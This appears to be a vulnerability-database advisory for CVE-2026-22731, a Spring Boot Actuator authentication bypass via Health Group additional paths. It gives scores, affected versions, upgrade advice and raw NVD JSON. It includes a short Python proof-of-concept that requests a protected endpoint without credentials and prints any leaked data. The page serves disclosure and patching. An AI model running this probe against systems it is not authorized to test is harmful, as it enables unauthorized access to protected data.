Security Vulnerability Report
CVE-2026-22731 CVSS 8.2 HIGH

Published: 2026-03-19 23:16:41
Last Modified: 2026-04-16 04:30:22

Description

Spring Boot applications with Actuator can be vulnerable to an "Authentication Bypass" vulnerability when an application endpoint that requires authentication is declared under a specific path, already configured for a Health Group additional path. This issue affects Spring Boot: from 4.0 before 4.0.3, from 3.5 before 3.5.11, from 3.4 before 3.4.15. This CVE is similar but not equivalent to CVE-2026-22733, as the conditions for exploit and vulnerable versions are different.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

The 8.2 score and vector above are the metric labelled "Secondary" (vendor-supplied) in the raw JSON at the bottom of this page. NVD's own "Primary" assessment differs: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H (8.1 HIGH), which rates attack complexity as High but scores confidentiality, integrity and availability impact all as High. Both agree that no privileges and no user interaction are required over the network.

Weakness classification: CWE-288 (Authentication Bypass Using an Alternate Path or Channel) from the vendor, CWE-306 (Missing Authentication for Critical Function) from NVD.

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* from 3.4.0 up to (excluding) 3.4.15 - VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* from 3.5.0 up to (excluding) 3.5.12 - VULNERABLE
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* from 4.0.0 up to (excluding) 4.0.4 - VULNERABLE

Spring Boot 3.4.0 - 3.4.14 (first fixed release 3.4.15)
Spring Boot 3.5.0 - 3.5.10 per the CVE description (first fixed release 3.5.11); the NVD CPE match above extends the affected range through 3.5.11
Spring Boot 4.0.0 - 4.0.2 per the CVE description (first fixed release 4.0.3); the NVD CPE match above extends the affected range through 4.0.3

Note the mismatch on this page: the description names 3.5.11 and 4.0.3 as the first fixed releases, while the NVD configuration data (versionEndExcluding 3.5.12 and 4.0.4 in the raw JSON) still treats 3.5.11 and 4.0.3 as affected. Confirm the fixed versions against the vendor advisory linked under References; the conservative choice is to upgrade to at least 3.4.15, 3.5.12 and 4.0.4 respectively.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# Target URL construction based on the vulnerable Health Group additional-path
# configuration. Example: /health-group-path is configured as a Health Group
# additional path, and an endpoint that should require authentication is
# mapped beneath it at /health-group-path/secret-config. Adjust both parts to
# the target's actual configuration.
base_url = sys.argv[1] if len(sys.argv) > 1 else "http://vulnerable-host:8080"
target_url = base_url.rstrip("/") + "/health-group-path/secret-config"

# Send an unauthenticated request. Redirects are not followed: a 30x to a
# login page must not be counted as a 200 from the protected endpoint.
response = requests.get(target_url, timeout=10, allow_redirects=False)

if response.status_code == 200:
    print("[+] Authentication bypass successful!")
    print("[+] Data leaked:")
    print(response.text)
else:
    # 401/403: the endpoint is still protected. 404: nothing is mapped at
    # that path, so the guessed paths do not match the target.
    print(f"[-] Exploit failed or target is patched (HTTP {response.status_code}).")
```

References

https://spring.io/security/cve-2026-22731 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22731", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:41.080", "lastModified": "2026-04-16T04:30:21.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spring Boot applications with Actuator can be vulnerable to an \"Authentication Bypass\" vulnerability when an application endpoint that requires authentication is declared under a specific path, already configured for a Health Group additional path.\nThis issue affects Spring Boot: from 4.0 before 4.0.3, from 3.5 before 3.5.11, from 3.4 before 3.4.15.\nThis CVE is similar but not equivalent to CVE-2026-22733, as the conditions for exploit and vulnerable versions are different."}, {"lang": "es", "value": "Las aplicaciones Spring Boot con Actuator pueden ser vulnerables a una vulnerabilidad de 'omisión de autenticación' cuando un endpoint de aplicación que requiere autenticación se declara bajo una ruta específica, ya configurada para una ruta adicional de un Grupo de Salud.\nEste problema afecta a Spring Boot: desde 4.0 antes de 4.0.3, desde 3.5 antes de 3.5.11, desde 3.4 antes de 3.4.15.\nEste CVE es similar pero no equivalente a CVE-2026-22733, ya que las condiciones para el exploit y las versiones vulnerables son diferentes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", 
"attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.15", "matchCriteriaId": "0ACB2610-CD68-4D6A-9C4C-0FA18E55E041"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.12", "matchCriteriaId": "2444685F-F529-45D4-91D6-4EDC9128024C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.4", "matchCriteriaId": "EF787BE2-58A8-442C-8165-9652D62C0829"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22731", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}